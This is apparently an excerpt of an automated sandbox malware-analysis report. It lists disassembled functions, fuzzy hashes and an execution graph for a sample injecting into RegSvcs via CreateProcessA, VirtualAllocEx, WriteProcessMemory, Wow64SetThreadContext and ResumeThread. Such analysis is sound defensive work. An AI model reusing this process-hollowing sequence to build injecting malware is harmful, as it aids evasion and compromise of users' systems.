                                                                                                          • Instruction ID: 35a4ac9b4fbc31cbcb0515465394416eec8c7558e68912f1ab0445516e4e3a85
                                                                                                          • Opcode Fuzzy Hash: 841cf5adb558943fa758e6b02c296189ce354904af703a9142cae63234101b66
                                                                                                          • Instruction Fuzzy Hash: DE018135B001116BDF64E66DA45072F62DAEBCAA10F24883AE20ECF341DE25DC034395
                                                                                                          Function 06A9A390 Relevance: .0, Instructions: 46COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d1a638e11b40c13d17f9adb1fccc878eaff6a85f1dbf83b7be0088a4ae442a63
                                                                                                          • Instruction ID: ea55124a49391ff3ede2c2b19af85e429ba806df34825917db6346fdc727d8cf
                                                                                                          • Opcode Fuzzy Hash: d1a638e11b40c13d17f9adb1fccc878eaff6a85f1dbf83b7be0088a4ae442a63
                                                                                                          • Instruction Fuzzy Hash: CE018175B001144BDB50AABDE89475BB3D6FBC9754F20883AE20ECB354EA21EC4287A5
                                                                                                          Function 06A9C838 Relevance: .0, Instructions: 39COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1be8d6615caf2b5449676a991875a85e35ad386f722ca12c74e11c76b89a11c8
                                                                                                          • Instruction ID: 55dd8866a2ecc7a865f9957b74cbf9843c8923587f5f25aec4e169d7cb88b57b
                                                                                                          • Opcode Fuzzy Hash: 1be8d6615caf2b5449676a991875a85e35ad386f722ca12c74e11c76b89a11c8
                                                                                                          • Instruction Fuzzy Hash: 68F09636E21324DBDF58EA69D8409EB77B6F784360F104429E902EB281D771AC15CBD0
                                                                                                          Function 06A9C848 Relevance: .0, Instructions: 33COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 489fb987acdbb4529de72f90a98fef879e4262b581431c83962bda8f8705bb6f
                                                                                                          • Instruction ID: 165c23218ad6bdc4525e91967ad2390500f496532d6a971d8f22ff9a5fed43d2
                                                                                                          • Opcode Fuzzy Hash: 489fb987acdbb4529de72f90a98fef879e4262b581431c83962bda8f8705bb6f
                                                                                                          • Instruction Fuzzy Hash: 13F0A736E2032897DF18BA65DC1059BB37AF784260F104425E902EB284D7716C0087D0
                                                                                                          Function 06A964F1 Relevance: .0, Instructions: 28COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9bb395122ac236dcaab4bf9a294aa99f52bd89107f391a6dc225c09becbf5168
                                                                                                          • Instruction ID: fb608aa90f1c672c1a01880cf9a25759f2ac343695db8c65292cc09e1b8219ff
                                                                                                          • Opcode Fuzzy Hash: 9bb395122ac236dcaab4bf9a294aa99f52bd89107f391a6dc225c09becbf5168
                                                                                                          • Instruction Fuzzy Hash: 24E09271A101086BEF50EB64D98565A7BEEDB02304F3058A1D405CB106E237DD018761

                                                                                                          Non-executed Functions

                                                                                                          Function 06A97720 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2222239885
                                                                                                          • Opcode ID: 63b8b1f9cbf98702baf28d5cbbc5b2453a09cadb3902a9d22391744e3e3023c5
                                                                                                          • Instruction ID: 37d011fb0bdf048ce47a6edbc826eee92e54a5106f647fbb62373f1907d54fbe
                                                                                                          • Opcode Fuzzy Hash: 63b8b1f9cbf98702baf28d5cbbc5b2453a09cadb3902a9d22391744e3e3023c5
                                                                                                          • Instruction Fuzzy Hash: D412F830E102198FDF68EF65D954AADB7F2BF88604F2085A9D409AB354DB30DD85CFA1
                                                                                                          Function 06A9A9B0 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-3823777903
                                                                                                          • Opcode ID: e37734335bb0f0fa49dc55564ef78d5a1847405111010c7bdb86b769be348a66
                                                                                                          • Instruction ID: 66c42a3c3b78939825c9ec6db60bba218d0b356379adad14edd6894c27b862db
                                                                                                          • Opcode Fuzzy Hash: e37734335bb0f0fa49dc55564ef78d5a1847405111010c7bdb86b769be348a66
                                                                                                          • Instruction Fuzzy Hash: B1913070E002099FDF68EFA5D59476EB7F2BF84300F20852AE5029F294DB75AD45CBA0
                                                                                                          Function 06A97120 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-390881366
                                                                                                          • Opcode ID: 6509b6dcc64f02fdd2eaea07dc7f3bbc2a3ec190cc331a36805bbaef29827715
                                                                                                          • Instruction ID: 4ae9b666f50812b494dc0ff9a03bebccc5a6fe064318fc6724114ddaea1940b3
                                                                                                          • Opcode Fuzzy Hash: 6509b6dcc64f02fdd2eaea07dc7f3bbc2a3ec190cc331a36805bbaef29827715
                                                                                                          • Instruction Fuzzy Hash: 76F12D34A11209CFDB59EF69D5A4A5EB7F2BFC4300F248569E4059B3A8DB31DC42CBA1
                                                                                                          Function 06A98458 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2125118731
                                                                                                          • Opcode ID: f0982d81b74b998ffd0015e1b5ebce5c66330d120ba6c3b4da7ee53956748a10
                                                                                                          • Instruction ID: 280f54553a602aabe47ea4fe2fbc5d1cbbda7e819c89167663fd2e1f9acb3aca
                                                                                                          • Opcode Fuzzy Hash: f0982d81b74b998ffd0015e1b5ebce5c66330d120ba6c3b4da7ee53956748a10
                                                                                                          • Instruction Fuzzy Hash: FDB12B70A002098FDF58EF69D59469EB7F2BF85300F248829D4069F3A5DB75D886CBA1
                                                                                                          Function 06A98870 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LR^q$LR^q$$^q$$^q
                                                                                                          • API String ID: 0-2454687669
                                                                                                          • Opcode ID: df11d12c78d6f63f522244eeecebc073f4d74e07d7f92bb55cc81de3077d0617
                                                                                                          • Instruction ID: 41bf85abe1b876ef1ec3eb145fe05686754c180f18e8eca28364762953e5371b
                                                                                                          • Opcode Fuzzy Hash: df11d12c78d6f63f522244eeecebc073f4d74e07d7f92bb55cc81de3077d0617
                                                                                                          • Instruction Fuzzy Hash: 7751A331B002059FDF58EF24D994A6AB7F1FF89700B248969D5059F3A9DB34EC44C7A1
                                                                                                          Function 06A9AD3B Relevance: 5.2, Strings: 4, Instructions: 160COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2125118731
                                                                                                          • Opcode ID: a5287f46cb0ba54d1ef2b207a8e63e7a7958011b33fa2f25ac593b7102453ac3
                                                                                                          • Instruction ID: 600612618020c798f82b3cc8529591c25ba397b801f96dab07ee26ed38f23649
                                                                                                          • Opcode Fuzzy Hash: a5287f46cb0ba54d1ef2b207a8e63e7a7958011b33fa2f25ac593b7102453ac3
                                                                                                          • Instruction Fuzzy Hash: 49517E70E102098FDFA5EB64D5906AEB7F2FB89300F20852AE9059F354DB30DC41CBA1

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:9.2%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:165
                                                                                                          Total number of Limit Nodes:8
                                                                                                          execution_graph 28059 6f8fed8 PostMessageW 28060 6f8ff44 28059->28060 27884 281d3c0 27885 281d406 GetCurrentProcess 27884->27885 27887 281d451 27885->27887 27888 281d458 GetCurrentThread 27885->27888 27887->27888 27889 281d495 GetCurrentProcess 27888->27889 27890 281d48e 27888->27890 27891 281d4cb 27889->27891 27890->27889 27892 281d4f3 GetCurrentThreadId 27891->27892 27893 281d524 27892->27893 27894 6f8d0bf 27895 6f8d0c5 27894->27895 27899 6f8ec30 27895->27899 27916 6f8ec20 27895->27916 27896 6f8d0d0 27900 6f8ec4a 27899->27900 27908 6f8ec6e 27900->27908 27933 6f8f132 27900->27933 27937 6f8f39d 27900->27937 27942 6f8f15d 27900->27942 27948 6f8f3bc 27900->27948 27955 6f8f526 27900->27955 27959 6f8f5a3 27900->27959 27964 6f8f8a3 27900->27964 27968 6f8f260 27900->27968 27973 6f8f40e 27900->27973 27978 6f8f0ac 27900->27978 27982 6f8f46a 27900->27982 27987 6f8faa9 27900->27987 27991 6f8fa28 27900->27991 27995 6f8f993 27900->27995 27908->27896 27917 6f8ec30 27916->27917 27918 6f8ec6e 27917->27918 27919 6f8f3bc 4 API calls 27917->27919 27920 6f8f15d 4 API calls 27917->27920 27921 6f8f39d 2 API calls 27917->27921 27922 6f8f132 2 API calls 27917->27922 27923 6f8f993 2 API calls 27917->27923 27924 6f8fa28 2 API calls 27917->27924 27925 6f8faa9 2 API calls 27917->27925 27926 6f8f46a 2 API calls 27917->27926 27927 6f8f0ac 2 API calls 27917->27927 27928 6f8f40e 2 API calls 27917->27928 27929 6f8f260 2 API calls 27917->27929 27930 6f8f8a3 2 API calls 27917->27930 27931 6f8f5a3 2 API calls 27917->27931 27932 6f8f526 2 API calls 27917->27932 27918->27896 27919->27918 27920->27918 27921->27918 27922->27918 27923->27918 27924->27918 27925->27918 27926->27918 27927->27918 27928->27918 27929->27918 27930->27918 27931->27918 27932->27918 27934 6f8f156 27933->27934 27999 6f8fdd8 27934->27999 28004 6f8fde8 27934->28004 27938 6f8f471 27937->27938 28017 6f8c7c8 27938->28017 28021 6f8c7c0 27938->28021 27939 6f8f5f0 28025 6f8c1f8 27942->28025 28029 6f8c1f3 27942->28029 27943 6f8f149 27946 6f8fde8 2 API calls 27943->27946 27947 6f8fdd8 2 API calls 27943->27947 27946->27943 27947->27943 28033 6f8c708 27948->28033 28037 6f8c700 27948->28037 27949 6f8f3a6 27951 6f8c7c8 WriteProcessMemory 27949->27951 27952 6f8c7c0 WriteProcessMemory 27949->27952 27950 6f8f5f0 27951->27950 27952->27950 27957 6f8c7c8 WriteProcessMemory 27955->27957 27958 6f8c7c0 WriteProcessMemory 27955->27958 27956 6f8f554 27957->27956 27958->27956 27960 6f8f5cc 27959->27960 27962 6f8c7c8 WriteProcessMemory 27960->27962 27963 6f8c7c0 WriteProcessMemory 27960->27963 27961 6f8f5f0 27962->27961 27963->27961 27966 6f8c1f8 Wow64SetThreadContext 27964->27966 27967 6f8c1f3 Wow64SetThreadContext 27964->27967 27965 6f8f8bd 27966->27965 27967->27965 27969 6f8f275 27968->27969 27970 6f8f817 27969->27970 27971 6f8fde8 2 API calls 27969->27971 27972 6f8fdd8 2 API calls 27969->27972 27970->27908 27971->27969 27972->27969 27974 6f8f414 27973->27974 28041 6f8c8b8 27974->28041 28045 6f8c8b2 27974->28045 27975 6f8f10b 27975->27908 28049 6f8ca50 27978->28049 28053 6f8ca44 27978->28053 27983 6f8f470 27982->27983 27985 6f8c7c8 WriteProcessMemory 27983->27985 27986 6f8c7c0 WriteProcessMemory 27983->27986 27984 6f8f5f0 27985->27984 27986->27984 27988 6f8fa30 27987->27988 27989 6f8fde8 2 API calls 27988->27989 27990 6f8fdd8 2 API calls 27988->27990 27989->27988 27990->27988 27992 6f8fa30 27991->27992 27993 6f8fde8 2 API calls 27992->27993 27994 6f8fdd8 2 API calls 27992->27994 27993->27992 27994->27992 27997 6f8c7c8 WriteProcessMemory 27995->27997 27998 6f8c7c0 WriteProcessMemory 27995->27998 27996 6f8f9b7 27997->27996 27998->27996 28000 6f8fdfd 27999->28000 28009 6f8bd09 28000->28009 28013 6f8bd10 28000->28013 28001 6f8fe10 28001->27934 28005 6f8fdfd 28004->28005 28007 6f8bd09 ResumeThread 28005->28007 28008 6f8bd10 ResumeThread 28005->28008 28006 6f8fe10 28006->27934 28007->28006 28008->28006 28010 6f8bd0f ResumeThread 28009->28010 28012 6f8bd81 28010->28012 28012->28001 28014 6f8bd20 ResumeThread 28013->28014 28016 6f8bd81 28014->28016 28016->28001 28018 6f8c810 WriteProcessMemory 28017->28018 28020 6f8c867 28018->28020 28020->27939 28022 6f8c7c8 WriteProcessMemory 28021->28022 28024 6f8c867 28022->28024 28024->27939 28026 6f8c23d Wow64SetThreadContext 28025->28026 28028 6f8c285 28026->28028 28028->27943 28030 6f8c1f8 Wow64SetThreadContext 28029->28030 28032 6f8c285 28030->28032 28032->27943 28034 6f8c748 VirtualAllocEx 28033->28034 28036 6f8c785 28034->28036 28036->27949 28038 6f8c708 VirtualAllocEx 28037->28038 28040 6f8c785 28038->28040 28040->27949 28042 6f8c903 ReadProcessMemory 28041->28042 28044 6f8c947 28042->28044 28044->27975 28046 6f8c8b7 ReadProcessMemory 28045->28046 28048 6f8c947 28046->28048 28048->27975 28050 6f8cad9 CreateProcessA 28049->28050 28052 6f8cc9b 28050->28052 28052->28052 28054 6f8ca4a CreateProcessA 28053->28054 28056 6f8cc9b 28054->28056 28056->28056 28082 6f8d000 28083 6f8ce6c 28082->28083 28083->28082 28084 6f8d027 28083->28084 28085 6f8ec30 12 API calls 28083->28085 28086 6f8ec20 12 API calls 28083->28086 28085->28084 28086->28084 28057 281d608 DuplicateHandle 28058 281d69e 28057->28058 28061 2814668 28062 281467a 28061->28062 28063 2814686 28062->28063 28065 2814778 28062->28065 28066 281479d 28065->28066 28070 2814879 28066->28070 28074 2814888 28066->28074 28072 28148af 28070->28072 28071 281498c 28071->28071 28072->28071 28078 28144c4 28072->28078 28076 28148af 28074->28076 28075 281498c 28075->28075 28076->28075 28077 28144c4 CreateActCtxA 28076->28077 28077->28075 28079 2815918 CreateActCtxA 28078->28079 28081 28159db 28079->28081 28087 281b038 28088 281b047 28087->28088 28091 281b120 28087->28091 28096 281b130 28087->28096 28092 281b164 28091->28092 28093 281b141 28091->28093 28092->28088 28093->28092 28094 281b368 GetModuleHandleW 28093->28094 28095 281b395 28094->28095 28095->28088 28097 281b164 28096->28097 28098 281b141 28096->28098 28097->28088 28098->28097 28099 281b368 GetModuleHandleW 28098->28099 28100 281b395 28099->28100 28100->28088

                                                                                                          Executed Functions

                                                                                                          Function 0A550D00 Relevance: .4, Instructions: 410COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1837984375.000000000A550000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A550000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_a550000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f39bd8b6a11d6495272a1a27663a895cbd95280067044d9835c46f0d83c9fc79
                                                                                                          • Instruction ID: 3684b9aaf18676e52cfa6d754d4ab4ccfe4898aaee3f7430a7c0a83fbbb26ba7
                                                                                                          • Opcode Fuzzy Hash: f39bd8b6a11d6495272a1a27663a895cbd95280067044d9835c46f0d83c9fc79
                                                                                                          • Instruction Fuzzy Hash: 94E1CA357026048FDB1ADB79D4607AEBBFABF89300F14486AE546DB2D0CB35E901CB51
                                                                                                          Function 0281D3B0 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 294 281d3b0-281d44f GetCurrentProcess 298 281d451-281d457 294->298 299 281d458-281d48c GetCurrentThread 294->299 298->299 300 281d495-281d4c9 GetCurrentProcess 299->300 301 281d48e-281d494 299->301 302 281d4d2-281d4ed call 281d59f 300->302 303 281d4cb-281d4d1 300->303 301->300 307 281d4f3-281d522 GetCurrentThreadId 302->307 303->302 308 281d524-281d52a 307->308 309 281d52b-281d58d 307->309 308->309
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0281D43E
                                                                                                          • GetCurrentThread.KERNEL32 ref: 0281D47B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0281D4B8
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0281D511
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1822585478.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_2810000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: 9143459ffb110803d6c20b4b7a0ea3bf212c6bd501f8c3dc45097cefbce92338
                                                                                                          • Instruction ID: e6a82d8dc2b261df95ce312f3e9df25ca20eb29a167a2d8a107dc0df5b415888
                                                                                                          • Opcode Fuzzy Hash: 9143459ffb110803d6c20b4b7a0ea3bf212c6bd501f8c3dc45097cefbce92338
                                                                                                          • Instruction Fuzzy Hash: 475156B8900349CFDB04DFA9D54879EBBF1AF48308F20C459D519A73A0D778A944CB66
                                                                                                          Function 0281D3C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 316 281d3c0-281d44f GetCurrentProcess 320 281d451-281d457 316->320 321 281d458-281d48c GetCurrentThread 316->321 320->321 322 281d495-281d4c9 GetCurrentProcess 321->322 323 281d48e-281d494 321->323 324 281d4d2-281d4ed call 281d59f 322->324 325 281d4cb-281d4d1 322->325 323->322 329 281d4f3-281d522 GetCurrentThreadId 324->329 325->324 330 281d524-281d52a 329->330 331 281d52b-281d58d 329->331 330->331
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0281D43E
                                                                                                          • GetCurrentThread.KERNEL32 ref: 0281D47B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0281D4B8
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0281D511
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1822585478.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_2810000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: ba6e239c824efb0eba81770450e3103272f93aca5226e07345b5942ff5245719
                                                                                                          • Instruction ID: fa197eb38fc44b523c85f556626a2a7b5883dcf4cbe4e4dcdff5d3969c1c8fa6
                                                                                                          • Opcode Fuzzy Hash: ba6e239c824efb0eba81770450e3103272f93aca5226e07345b5942ff5245719
                                                                                                          • Instruction Fuzzy Hash: 8D5156B89002498FDB14DFA9D548BDEBBF5EF88308F20C459D419A73A0D778A944CB65
                                                                                                          Function 06F8CA44 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 338 6f8ca44-6f8ca48 339 6f8ca4a 338->339 340 6f8ca4b-6f8cae5 338->340 339->340 342 6f8cb1e-6f8cb3e 340->342 343 6f8cae7-6f8caf1 340->343 350 6f8cb40-6f8cb4a 342->350 351 6f8cb77-6f8cba6 342->351 343->342 344 6f8caf3-6f8caf5 343->344 345 6f8cb18-6f8cb1b 344->345 346 6f8caf7-6f8cb01 344->346 345->342 348 6f8cb03 346->348 349 6f8cb05-6f8cb14 346->349 348->349 349->349 352 6f8cb16 349->352 350->351 353 6f8cb4c-6f8cb4e 350->353 357 6f8cba8-6f8cbb2 351->357 358 6f8cbdf-6f8cc99 CreateProcessA 351->358 352->345 355 6f8cb50-6f8cb5a 353->355 356 6f8cb71-6f8cb74 353->356 359 6f8cb5c 355->359 360 6f8cb5e-6f8cb6d 355->360 356->351 357->358 362 6f8cbb4-6f8cbb6 357->362 371 6f8cc9b-6f8cca1 358->371 372 6f8cca2-6f8cd28 358->372 359->360 360->360 361 6f8cb6f 360->361 361->356 363 6f8cbb8-6f8cbc2 362->363 364 6f8cbd9-6f8cbdc 362->364 366 6f8cbc4 363->366 367 6f8cbc6-6f8cbd5 363->367 364->358 366->367 367->367 369 6f8cbd7 367->369 369->364 371->372 382 6f8cd38-6f8cd3c 372->382 383 6f8cd2a-6f8cd2e 372->383 385 6f8cd4c-6f8cd50 382->385 386 6f8cd3e-6f8cd42 382->386 383->382 384 6f8cd30 383->384 384->382 388 6f8cd60-6f8cd64 385->388 389 6f8cd52-6f8cd56 385->389 386->385 387 6f8cd44 386->387 387->385 391 6f8cd76-6f8cd7d 388->391 392 6f8cd66-6f8cd6c 388->392 389->388 390 6f8cd58 389->390 390->388 393 6f8cd7f-6f8cd8e 391->393 394 6f8cd94 391->394 392->391 393->394 396 6f8cd95 394->396 396->396
                                                                                                          APIs
                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F8CC86
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1835289548.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6f80000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 963392458-0
                                                                                                          • Opcode ID: 3739c314239ec67ccfc59e556a9dacaeb2cbce184485545395bc1573327551d6
                                                                                                          • Instruction ID: 0f50bf0b9d6b9a165cff77de0727b8c7f07f60bf6732cdb0c03533419d38fb88
                                                                                                          • Opcode Fuzzy Hash: 3739c314239ec67ccfc59e556a9dacaeb2cbce184485545395bc1573327551d6
                                                                                                          • Instruction Fuzzy Hash: 70A1AF71D00619DFDB60DF68C841BDDBBB2FF44310F1485AAE858A7290DB749985CFA2
                                                                                                          Function 06F8CA50 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 397 6f8ca50-6f8cae5 399 6f8cb1e-6f8cb3e 397->399 400 6f8cae7-6f8caf1 397->400 407 6f8cb40-6f8cb4a 399->407 408 6f8cb77-6f8cba6 399->408 400->399 401 6f8caf3-6f8caf5 400->401 402 6f8cb18-6f8cb1b 401->402 403 6f8caf7-6f8cb01 401->403 402->399 405 6f8cb03 403->405 406 6f8cb05-6f8cb14 403->406 405->406 406->406 409 6f8cb16 406->409 407->408 410 6f8cb4c-6f8cb4e 407->410 414 6f8cba8-6f8cbb2 408->414 415 6f8cbdf-6f8cc99 CreateProcessA 408->415 409->402 412 6f8cb50-6f8cb5a 410->412 413 6f8cb71-6f8cb74 410->413 416 6f8cb5c 412->416 417 6f8cb5e-6f8cb6d 412->417 413->408 414->415 419 6f8cbb4-6f8cbb6 414->419 428 6f8cc9b-6f8cca1 415->428 429 6f8cca2-6f8cd28 415->429 416->417 417->417 418 6f8cb6f 417->418 418->413 420 6f8cbb8-6f8cbc2 419->420 421 6f8cbd9-6f8cbdc 419->421 423 6f8cbc4 420->423 424 6f8cbc6-6f8cbd5 420->424 421->415 423->424 424->424 426 6f8cbd7 424->426 426->421 428->429 439 6f8cd38-6f8cd3c 429->439 440 6f8cd2a-6f8cd2e 429->440 442 6f8cd4c-6f8cd50 439->442 443 6f8cd3e-6f8cd42 439->443 440->439 441 6f8cd30 440->441 441->439 445 6f8cd60-6f8cd64 442->445 446 6f8cd52-6f8cd56 442->446 443->442 444 6f8cd44 443->444 444->442 448 6f8cd76-6f8cd7d 445->448 449 6f8cd66-6f8cd6c 445->449 446->445 447 6f8cd58 446->447 447->445 450 6f8cd7f-6f8cd8e 448->450 451 6f8cd94 448->451 449->448 450->451 453 6f8cd95 451->453 453->453
                                                                                                          APIs
                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F8CC86
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1835289548.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6f80000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 963392458-0
                                                                                                          • Opcode ID: 378d8a54da4883b1817813a7a8628b9bd99b57c711145b69f5aeb1a182597fa7
                                                                                                          • Instruction ID: 67d094ef565c7203a3dd9081619dde01413e76adf9c3390cf8e7c927403cd355
                                                                                                          • Opcode Fuzzy Hash: 378d8a54da4883b1817813a7a8628b9bd99b57c711145b69f5aeb1a182597fa7
                                                                                                          • Instruction Fuzzy Hash: D8919D71D00619DFDB60EF68C841BDDBBB2FF48310F1485AAE818A7250DB749985CFA2
                                                                                                          Function 0281B130 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
